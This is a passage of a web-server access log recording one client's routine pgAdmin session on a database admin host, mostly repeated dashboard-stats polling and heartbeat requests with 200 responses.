(KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:59:30 +0000] - 200 200 - POST https db.profibot.hu "/sqleditor/query_history/3857941" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:59:31 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[26/Jan/2026:09:59:32 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:59:37 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:59:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:59:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:59:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:59:53 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:09:59:58 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:00:03 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:00:07 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:00:08 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:00:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:00:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:00:23 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:00:28 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:00:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:00:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:00:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:01:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:01:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:01:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:02:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:02:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:03:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:03:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:04:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:04:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 265] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:05:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:05:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:06:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:06:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:06:54 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:07:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:07:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:08:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:08:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:09:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:09:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:10:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:10:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:11:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:11:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:12:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:12:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:12:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:13:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:13:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:14:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:14:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:15:22 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:15:22 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:15:28 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:15:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:15:37 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:15:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:15:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:15:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:15:53 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:15:58 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:16:03 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:16:07 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:16:08 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:16:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:16:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:16:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:16:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:17:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:17:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:17:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:18:41 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[26/Jan/2026:10:18:41 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 266] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" 